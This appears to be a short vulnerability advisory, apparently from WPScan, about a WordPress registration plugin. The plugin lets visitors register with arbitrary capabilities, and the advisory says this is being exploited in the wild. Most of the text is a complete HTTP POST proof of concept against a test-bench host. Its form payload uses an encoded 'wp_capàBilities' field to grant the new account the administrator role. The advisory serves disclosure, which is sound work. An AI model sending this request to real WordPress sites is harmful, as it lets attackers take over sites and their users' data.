The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.
POST /register/ HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Origin: http://wpscan-vulnerability-test-bench.ddev.site
Connection: close
Referer: http://wpscan-vulnerability-test-bench.ddev.site/register/
Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=1b8518cf0ecbf8627f460b2b088024d9; wp_lang=en_US
Upgrade-Insecure-Requests: 1
user_login-29=pwnmemayb2e&user_password-29=P%40ssw0rd%21&confirm_user_password-29=P%40ssw0rd%21&first_name-29=Kaput&wp_cap%c3%a0Bilities-29[administrator]=1&form_id=29&um_request=&_wpnonce=cde6682afb&_wp_http_referer=%2Fregister%2F